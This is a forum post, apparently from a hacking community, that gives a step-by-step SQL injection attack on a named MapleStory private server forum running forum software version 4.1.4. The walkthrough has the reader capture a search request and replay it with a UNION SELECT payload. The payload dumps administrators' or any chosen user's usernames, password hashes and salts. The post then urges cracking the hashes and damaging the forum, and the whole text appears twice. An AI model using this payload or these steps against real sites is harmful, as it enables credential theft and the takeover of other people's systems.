Admin
Well-Known Member
Staff member
Administrator
Target:
http://forum.swagms.info
Yes, its a maplestory private server forum version 4.1.4, its exploitable .
First you will obviously need to register and go to group.php
Target:
http://forum.swagms.info/group.php
Since i already made a group and a discussion, there's no need for you to make one.
The discussion I made is called "awesome1337" so now go to search.php .
Target:
http://forum.swagms.info/search.php and tick the following ...
-
tick group messages
tick exact name
search awesome1337
When you click search, quickly open HTTP headers and click capture on and you should get the page information, click on any line and type in "ty" to find the type=%query information...it should look like this
Now, as it is highlighted already click replay to put in the exploit SQL injection :happycry:
You should get something like this
Now all you have to do is add the SQL injection code to it, which is
Quote:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#
add it in to the LIVE HTTP HEADERS
http://i43.servimg.com/u/f43/12/53/66/00/414.png
and CLICK REPLAY
http://i43.servimg.com/u/f43/12/53/66/00/513.png
http://i43.servimg.com/u/f43/12/53/66/00/612.png
s you can see, I successfully exploited the forum and now I have the Administrators passwords which are in a HASH, from there your on your own cracking the hashes and ****ing up the forum if you wish. I suggest using PasswordPro to crack the hashes.
To Hack a single User use this code
Quote:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where userid=1#
change userid to whatever the users id
tks To bits !!!
http://forum.swagms.info
Yes, its a maplestory private server forum version 4.1.4, its exploitable .
First you will obviously need to register and go to group.php
Target:
http://forum.swagms.info/group.php
Since i already made a group and a discussion, there's no need for you to make one.
The discussion I made is called "awesome1337" so now go to search.php .
Target:
http://forum.swagms.info/search.php and tick the following ...
-
tick group messages
tick exact name
search awesome1337
When you click search, quickly open HTTP headers and click capture on and you should get the page information, click on any line and type in "ty" to find the type=%query information...it should look like this
Now, as it is highlighted already click replay to put in the exploit SQL injection :happycry:
You should get something like this
Now all you have to do is add the SQL injection code to it, which is
Quote:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#
add it in to the LIVE HTTP HEADERS
http://i43.servimg.com/u/f43/12/53/66/00/414.png
and CLICK REPLAY
http://i43.servimg.com/u/f43/12/53/66/00/513.png
http://i43.servimg.com/u/f43/12/53/66/00/612.png
s you can see, I successfully exploited the forum and now I have the Administrators passwords which are in a HASH, from there your on your own cracking the hashes and ****ing up the forum if you wish. I suggest using PasswordPro to crack the hashes.
To Hack a single User use this code
Quote:
&messagegroupid[0]=1 ) union select group_concat(username,0x3a,password,0x3a,salt) from user where userid=1#
change userid to whatever the users id
tks To bits !!!
